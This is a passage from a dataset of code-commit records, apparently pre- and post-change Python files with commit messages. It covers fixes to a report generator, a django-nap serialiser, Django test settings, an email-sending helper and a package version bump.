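    ['tests.' + name for name in names])
unittest.TextTestRunner(verbosity=2).run(suite)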
84af834a348097f493b1e63034c8d0487354d737
|
qanta/reporting/report_generator.py
|
qanta/reporting/report_generator.py
|
from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(md_output)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
|
from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(markdown)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
|
Fix bug where there was an empty report
|
Fix bug where there was an empty report
|
Python
|
mit
|
miyyer/qb,miyyer/qb,Pinafore/qb,miyyer/qb,miyyer/qb,Pinafore/qb
|
from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(md_output)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
Fix bug where there was an empty report
|
from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(markdown)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
|
<commit_before>from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(md_output)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
<commit_msg>Fix bug where there was an empty report<commit_after>
|
from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(markdown)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
|
from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(md_output)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
Fix bug where there was an empty reportfrom jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(markdown)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
|
<commit_before>from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(md_output)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
<commit_msg>Fix bug where there was an empty report<commit_after>from jinja2 import Environment, PackageLoader
from qanta import qlogging
log = qlogging.get(__name__)
class ReportGenerator:
def __init__(self, template):
self.template = template
def create(self, variables, md_output, pdf_output):
env = Environment(loader=PackageLoader('qanta', 'reporting/templates'))
template = env.get_template(self.template)
markdown = template.render(variables)
if md_output is not None:
with open(md_output, 'w') as f:
f.write(markdown)
try:
import pypandoc
pypandoc.convert_text(
markdown,
'pdf',
format='md',
outputfile=pdf_output,
extra_args=['-V', 'geometry:margin=.75in']
)
except Exception as e:
log.warn('Pandoc was not installed or there was an error calling it, omitting PDF report')
log.warn(str(e))
|
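A usage sketch for the fixed generator; the template and variable names are hypothetical, and the template must live under qanta/reporting/templates:
generator = ReportGenerator('performance.md')
generator.create(
    {'accuracy': 0.87, 'n_questions': 1200},  # rendered into the template
    md_output='report.md',    # now receives the rendered markdown
    pdf_output='report.pdf',  # skipped with a warning if pandoc is missing
)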
5ee94e9a74bc4128ed8e7e10a2106ea422f22757
|
sandbox/sandbox/polls/serialiser.py
|
sandbox/sandbox/polls/serialiser.py
|
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll',)
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField(serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
|
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll',)
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField('choices_set.all', serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
|
Add attribute to choices field declaration
|
Add attribute to choices field declaration
|
Python
|
bsd-3-clause
|
MarkusH/django-nap,limbera/django-nap
|
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll',)
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField(serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
Add attribute to choices field declaration
|
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll',)
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField('choices_set.all', serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
|
<commit_before>
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll',)
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField(serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
<commit_msg>Add attribute to choices field declaration<commit_after>
|
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll',)
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField('choices_set.all', serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
|
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll',)
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField(serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
Add attribute to choices field declaration
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll',)
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField('choices_set.all', serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
|
<commit_before>
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll',)
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField(serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
<commit_msg>Add attribute to choices field declaration<commit_after>
from nap import models, fields, api, serialiser, publisher
from .models import Choice, Poll
class ChoiceSerialiser(models.ModelSerialiser):
class Meta:
model = Choice
exclude = ('poll',)
class PollSerialiser(serialiser.Serialiser):
api_name = 'poll'
question = fields.Field()
published = fields.DateTimeField('pub_date')
choices = fields.ManySerialiserField('choices_set.all', serialiser=ChoiceSerialiser())
class PollPublisher(publisher.Publisher):
serialiser = PollSerialiser()
api_name = 'polls'
def get_object_list(self):
return Poll.objects.all()
api.register('api', PollPublisher)
|
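The 'choices_set.all' argument is a dotted attribute path resolved against each Poll instance; the traversal idea amounts to something like the sketch below (an illustration of the concept only, not nap's actual implementation):
def traverse(obj, path):
    """Resolve a dotted path such as 'choices_set.all' against obj."""
    for name in path.split('.'):
        obj = getattr(obj, name)
        if callable(obj):  # call manager/queryset methods such as .all
            obj = obj()
    return obj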
a3c49c490ffe103f759b935bae31c37c05d26e81
|
tests/settings.py
|
tests/settings.py
|
# -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
|
# -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '/tmp/django-formtools-tests.db',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
|
Use a filesystem db and add the sites app to fix a test failure.
|
Use a filesystem db and add the sites app to fix a test failure.
|
Python
|
bsd-3-clause
|
gchp/django-formtools,thenewguy/django-formtools,lastfm/django-formtools,barseghyanartur/django-formtools,thenewguy/django-formtools,barseghyanartur/django-formtools,gchp/django-formtools,lastfm/django-formtools
|
# -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
Use a filesystem db and add the sites app to fix a test failure.
|
# -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '/tmp/django-formtools-tests.db',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
|
<commit_before># -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
<commit_msg>Use a filesystem db and add the sites app to fix a test failure.<commit_after>
|
# -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '/tmp/django-formtools-tests.db',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
|
# -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
Use a filesystem db and add the sites app to fix a test failure.# -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '/tmp/django-formtools-tests.db',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
|
<commit_before># -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
<commit_msg>Use a filesystem db and add the sites app to fix a test failure.<commit_after># -*- coding: utf-8 -*-
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '/tmp/django-formtools-tests.db',
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'formtools',
'tests.wizard.wizardtests',
]
SECRET_KEY = 'spam-spam-spam-spam'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'spam-and-eggs'
}
}
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
)
|
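Why the database change above matters: with sqlite, every connection to ':memory:' gets its own empty database, so any test path that opens a second connection sees no tables; a file-backed path is shared. A minimal sketch of the failure mode (table name illustrative):

import sqlite3
a = sqlite3.connect(':memory:')
b = sqlite3.connect(':memory:')   # a different, empty in-memory database
a.execute('CREATE TABLE t (x)')
# b.execute('SELECT * FROM t')    # would raise: no such table in b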
36b10d57a812b393c73fe3b4117cc133d0f9d110
|
templatemailer/mailer.py
|
templatemailer/mailer.py
|
import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
    :param user: User instance or recipient email address
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
### send email
send_email_f(
user.pk if user else None,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
|
import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
    :param user: User instance or recipient email address
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
try:
user = user.pk
except AttributeError:
pass
### send email
send_email_f(
user,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
|
Fix AttributeError when supplying email address as user
|
Fix AttributeError when supplying email address as user
|
Python
|
mit
|
tuomasjaanu/django-templatemailer
|
import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
    :param user: User instance or recipient email address
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
### send email
send_email_f(
user.pk if user else None,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
Fix AttributeError when supplying email address as user
|
import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
    :param user: User instance or recipient email address
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
try:
user = user.pk
except AttributeError:
pass
### send email
send_email_f(
user,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
|
<commit_before>import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
    :param user: User instance or recipient email address
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
### send email
send_email_f(
user.pk if user else None,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
<commit_msg>Fix AttributeError when supplying email address as user<commit_after>
|
import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
    :param user: User instance or recipient email address
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
try:
user = user.pk
except AttributeError:
pass
### send email
send_email_f(
user,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
|
import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
    :param user: User instance or recipient email address
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
### send email
send_email_f(
user.pk if user else None,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
Fix AttributeError when supplying email address as userimport logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
    :param user: User instance or recipient email address
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
try:
user = user.pk
except AttributeError:
pass
### send email
send_email_f(
user,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
|
<commit_before>import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
    :param user: User instance or recipient email address
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
### send email
send_email_f(
user.pk if user else None,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
<commit_msg>Fix AttributeError when supplying email address as user<commit_after>import logging
from django.core import mail
from .tasks import task_email_user
logger = logging.getLogger(__name__)
def send_email(user, template, context, attachments=None, delete_attachments_after_send=False,
language_code=None):
'''
Send email to user
    :param user: User instance or recipient email address
:param template: Template to use for email
:param context: Context for email
:param attachments: List of attachments
:param delete_attachments_after_send: If true, delete attachments from storage after sending
:param language_code: Language code for template
:return:
'''
### check if we are using test framework
if hasattr(mail, 'outbox'):
### if yes, do not defer sending email
send_email_f = task_email_user
else:
### otherwise, defer sending email to celery
send_email_f = task_email_user.delay
try:
user = user.pk
except AttributeError:
pass
### send email
send_email_f(
user,
template,
context,
attachments=attachments,
delete_attachments_after_send=delete_attachments_after_send,
language_code=language_code
)
|
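The pattern behind this fix is plain duck typing: try to read .pk and, failing that, treat the value as a raw email string. A self-contained sketch of the same idea (function name hypothetical, not part of the library):

def normalize_recipient(user_or_email):
    try:
        return user_or_email.pk   # User instance: forward its primary key
    except AttributeError:
        return user_or_email      # plain string or None: pass through unchanged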
359cab09d0cf7de375b43f82f9a9507f3c84cd34
|
distutilazy/__init__.py
|
distutilazy/__init__.py
|
"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.0"
__all__ = ("clean", "pyinstaller", "command")
|
"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.1"
__all__ = ("clean", "command", "pyinstaller", "test")
|
Add test to __all__ in package, bump version to 0.4.1
|
Add test to __all__ in package, bump version to 0.4.1
|
Python
|
mit
|
farzadghanei/distutilazy
|
"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.0"
__all__ = ("clean", "pyinstaller", "command")
Add test to __all__ in package, bump version to 0.4.1
|
"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.1"
__all__ = ("clean", "command", "pyinstaller", "test")
|
<commit_before>"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.0"
__all__ = ("clean", "pyinstaller", "command")
